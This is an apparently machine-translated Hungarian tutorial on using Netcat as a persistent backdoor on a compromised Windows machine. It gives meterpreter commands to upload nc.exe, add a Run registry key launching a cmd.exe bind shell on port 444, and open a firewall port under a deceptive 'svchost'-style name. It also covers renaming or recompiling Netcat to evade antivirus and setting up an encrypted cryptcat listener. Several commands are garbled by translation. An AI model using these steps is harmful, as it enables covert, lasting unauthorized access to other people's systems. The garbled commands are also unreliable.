Phenquestions
Bevezetés:
A Netcat egy hálózati segédprogram, amely képes olvasni és írni mind az UDP, mind a TCP portokra. Gyakran a svájci hadsereg hackelőeszközeinek nevezik, mert hackelési kalandok során mind kliensként, mind szerverként több dolgot képes megtenni. Gyakran használjuk kötés és fordított héj burkolat létrehozására a jelentések körül, hogy lássuk, mi történik, és fájlokat küldjünk a gépek között. A Shell egy olyan mód, amellyel interakcióba léphet egy számítógéppel, például egy parancssorral a Windows rendszeren vagy a Linux terminálján. A Netcat lehetővé teszi számunkra, hogy sok mindent elvégezzünk, például fordított polcokat, két vagy több számítógép közötti kommunikációt, és rengeteg funkciót hajthatunk végre. A Netcat egyszerű parancs-argumentumokkal képes Port Scan-re csatlakozni és csatlakozni a nyitott portokhoz. Képes fájlok küldésére és távoli adminisztráció biztosítására akár közvetlen, akár fordított shell segítségével.
A Netcat állandó ügynökként történő alkalmazása:
A Netcat rendkívül sokoldalú és hasznos program. A cikkben már említettem, hogy két számítógép közötti kommunikációra használják. Akkor is használható, ha telepíteni szeretné a perzisztenciát. A Netcat hátsó ajtóként használható. Kezdjük tehát azzal, hogy a Netcat használatával létrehozunk egy állandó héjat a veszélyeztetett rendszeren. A -nc-t fogjuk használni.exe, mivel ez a futtatható fájl neve. De ha átnevezi a használat előtt, minimalizálja az észlelés esélyét. Azonban még egy víruskereső szoftver átnevezése után is felismerhető. Sok hacker megváltoztatja a Netcat forráskódjának néhány elemét, amelyek feleslegesek, és mielőtt felhasználnák, fordítsák újra. Ezek a változtatások láthatatlanná teszik a Netcat-t az antivírus-szoftverek számára.
Kalin a Netcat az / usr / share / windows-binaries könyvtárban van tárolva. A feltört rendszerbe való feltöltéshez használja a meterpreter parancsot:
$ meterpreter> upload / usr / share / windows-binaries / nc.exe C: \\ WINDOWS \\ rendszer32
Nagyon sok fájltípus van ebben a mappában, ha egy fájlt el akar rejteni egy sérült rendszerben, ez a legjobb hely
Akkor is használhat Trivial fájlátviteli protokollt, ha nincs mérőóra kapcsolata a fájl átviteléhez.
A következő lépés a beállításjegyzék konfigurálása, hogy elindítsa a Netcat-ot a rendszer indításakor, és ellenőrizze, hogy a 444-es porton hallgat-e. Használja az alábbi parancsot:
$ meterpreter> reg setval -k HKLM \\ software \\ microsoft \\ windows \\currentversion \\ run -vv nc -d 'C: \\ windows \\ system32 \\ nc.exe -Ldp 444
-e cmd.alkalmazás'
Most, hogy használta a fent említett parancsot, használja a következő queryval parancsot, hogy megbizonyosodjon a változás sikeres végrehajtásáról a rendszerleíró adatbázisban.
$ meterpreter> reg queryval -kHKLM \\ szoftver \ microsoft \\ windows \\currentverion \\ run -vv nc
Nyisson meg egy portot egy helyi tűzfalon, és erősítse meg, hogy a megsértett rendszer elfogadja a távoli kapcsolatokat a Netcat-tal a $ netsh paranccsal. A cél operációs rendszerének ismerete kiemelt fontosságú. A Windows Vista, a Windows Server 2008 rendszerhez használt parancssori kontextus az
$ netsh advfirewallKorábbi rendszereknél a $ netsh tűzfal parancsot használják. Írja be a shell parancsot a meterpreter parancssorba a port hozzáadásához a helyi Windows tűzfalhoz, írja be a szabályt a megfelelő paranccsal. A rendszer megfelelő működése érdekében a szabály megnevezése közben használja a felhasználónevet, mint például az „svchostpassthrough”. A minta parancs a következőképpen jelenik meg:
$ C: \ Windows \ system32> netsh tűzfal adja hozzá a port megnyitásátTCP 444 "szolgáltatásátadás"
A változtatás sikeres végrehajtásának megerősítése a következő paranccsal:
$ C: \ windows \ system32> netsh tűzfal megmutatja a port megnyitását
A portszabály megerősítése után ellenőrizze, hogy működik-e az újraindítás.
Írja be a következő parancsot a meterpreter parancssorából:
$ meterpreter> indítsa újraÍrja be a következő parancsot egy interaktív Windows héjból:
$ C: \ windows \ system32> leállítás -r -t 00A veszélyeztetett rendszer távoli eléréséhez írja be a $ nc parancssorba, jelezze a kapcsolat valósághűségét (az -v és -vv jelentik az alapinformációkat, sokkal több információt), majd adja meg a cél IP-címét és a portszámot.
$ nc -v 192.168.43.128 444
Sajnos a Netcatnak vannak bizonyos korlátai, vagyis nincs továbbított adatok hitelesítése, és a vírusirtó szoftverek felismerhetik. A kevesebb titkosítás problémája azonban megoldható a cryptcat használatával, amely a Netcat alternatívája. A kihasznált gazdagép és a támadó közötti átvitel során Twofish titkosítással biztosítja az adatok biztonságát. Nem lesz téves azt mondani, hogy ésszerűen erős védelmet nyújt a titkosított adatok számára.
Győződjön meg arról, hogy a hallgató készen áll és erős jelszóval van konfigurálva a cryptcat használatához, használja a következő parancsot:
$ sudo cryptcat -k jelszó -l -p 444A következő lépés a cryptcat feltöltése a sérült rendszerbe, és a következő paranccsal konfigurálható, hogy csatlakozzon a hallgató IP-címéhez:
$ C: \ cryptcat -k jelszóNem szerencsés azt mondani, hogy a Netcat és annak változatai víruskereső szoftverrel felismerhetők. A Netcat forráskódjának megváltoztatásához hexadecimális szerkesztővel lehetőség van arra, hogy a Netcat észrevétlen maradjon. De ez egy hosszú próba-hiba folyamat. Megbízhatóbb megközelítés a Metasploit Framework tartós mechanizmusainak használata.
Következtetés:
A NETCAT egy svájci kés, amelyet hatékony hackelésre használnak. Számos funkciót képes végrehajtani a szerver és az ügyfél eléréséhez. Ez a cikk rövid leírást nyújt a NETCAT működéséről és használatáról. Remélem tetszett, ha ez a cikk segített Önnek, majd ossza meg barátaival. Kérdezzen nyugodtan a NETCAT-tal kapcsolatos kérdéseiről. Ön is megoszthatja véleményét és további részleteit.
